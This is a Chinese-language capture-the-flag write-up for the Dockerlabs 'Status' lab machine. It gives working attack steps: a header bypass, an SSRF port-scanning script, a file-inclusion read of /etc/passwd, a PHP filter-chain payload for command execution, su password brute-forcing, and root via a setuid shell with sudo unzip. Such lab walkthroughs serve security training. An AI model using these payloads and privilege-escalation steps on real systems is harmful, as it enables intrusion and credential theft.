Dockerlabs-Status

Nmap
#

[root@kali] /home/kali/status  
❯ nmap 172.17.0.2 -A -p-               

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Web Bunkeriana

只开放了80端口

Gobuser
#

[root@kali] /home/kali/status  
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php                                    ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 5197]
/status.php           (Status: 403) [Size: 5197]
/.php                 (Status: 403) [Size: 5197]
/server-status        (Status: 403) [Size: 5197]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

查看到有一个status.php，状态码是403

注意到响应头中有一个Statusid是0，尝试将其修改为1

[root@kali] /home/kali/status  
❯ curl http://172.17.0.2/status.php -H "Statusid: 1"                                                                                          ⏎

<h1>Server Status</h1>
<p>200</p>

<h1>Check Status</h1>
<form method="POST">
    <input type="url" name="url" placeholder="http://example.com" required>
    <button>Send</button>
</form>



<footer style="position: fixed; bottom: 10px; right: 10px; font-size: 0.9em; color: gray;">
    v0.2
</footer>

可以提交一个url参数

SSRF
#

不能直接读取文件，那么进行内网端口探测

import requests  
  
target = "http://172.17.0.2/status.php"  
  
for port in range(1, 65536):  
    url_to_check = f"http://127.0.0.1:{port}"  
    payload = {'url': url_to_check}  
    try:  
        response = requests.post(url=target, data=payload, headers={'Statusid': '1'})  
        if 'HTTP Status: 0' not in response.text:  
            print(f"[+] Port open: {port}")  
    except Exception:  
        continue

访问页面给出了一个路由

得到一个压缩包

解压后发现一个file.php可以进行文件包含

[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev  
❯ ls
file.php  status.php

[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev  
❯ cat file.php  
<?php 
if($_SERVER['REQUEST_METHOD'] === 'GET'){
    $file = $_GET['72e22dffd7fa10883a85aa3e0bbbd6d4'];
    include($file);
}
?>#

Include
#

可以如下访问得到/etc/passwd

http://172.17.0.2/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev/file.php?72e22dffd7fa10883a85aa3e0bbbd6d4=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
baluton:x:1001:1001:baluton,,,:/home/baluton:/bin/bash
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:102:MariaDB Server,,,:/nonexistent:/bin/false
redghost:x:1002:1002:redghost,,,:/home/redghost:/bin/bash

尝试使用filterchains来进行命令执行

[root@kali] /home/kali/Desktop/php_filter_chain_generator (main) 
❯ python php_filter_chain_generator.py --chain '<?php system($_GET["a"]);?>'
[+] The following gadget chain will generate the following code : <?php system($_GET["a"]);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJhIl0pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.
<skip>

拿到反弹shell

SuForce
#

没有找到可以利用的东西，进行密码爆破一下

www-data@f0f1168fc905:/var/www/html$ ./suForce -u baluton -w rockyou.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | baluton
📖 Wordlist | rockyou.txt
🔎 Status   | 40/14344392/0%/123123
💥 Password | 123123
───────────────────────────────────

baluton@f0f1168fc905:/var/www/html$ ./suForce -u redghost -w rockyou.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | redghost
📖 Wordlist | rockyou.txt
🔎 Status   | 104/14344392/0%/estrella
💥 Password | estrella
───────────────────────────────────

Root
#

类似于Bola

baluton@8470eb7f0e97:/home$ sudo -l
Matching Defaults entries for baluton on 8470eb7f0e97:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User baluton may run the following commands on 8470eb7f0e97:
    (ALL) NOPASSWD: /usr/bin/unzip

baluton@8470eb7f0e97:~$ cp /bin/sh .
baluton@8470eb7f0e97:~$ chmod +s sh
baluton@8470eb7f0e97:~$ zip shell.zip sh
  adding: sh (deflated 52%)
baluton@8470eb7f0e97:~$ sudo unzip -K shell.zip
Archive:  shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: sh                      
baluton@8470eb7f0e97:~$ ./sh -p
# id
uid=1001(baluton) gid=1001(baluton) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluton)

或者解压根目录的压缩包，也有密码

baluton@8470eb7f0e97:~$ cat regalitoregalazoregalin.txt 
root:balulonbalulinbalutonjeje
baluton@8470eb7f0e97:~$ su root
Password: 
root@8470eb7f0e97:/home/baluton#

Reply by Email

Nmap #

Gobuser #

SSRF #

Include #

SuForce #

Root #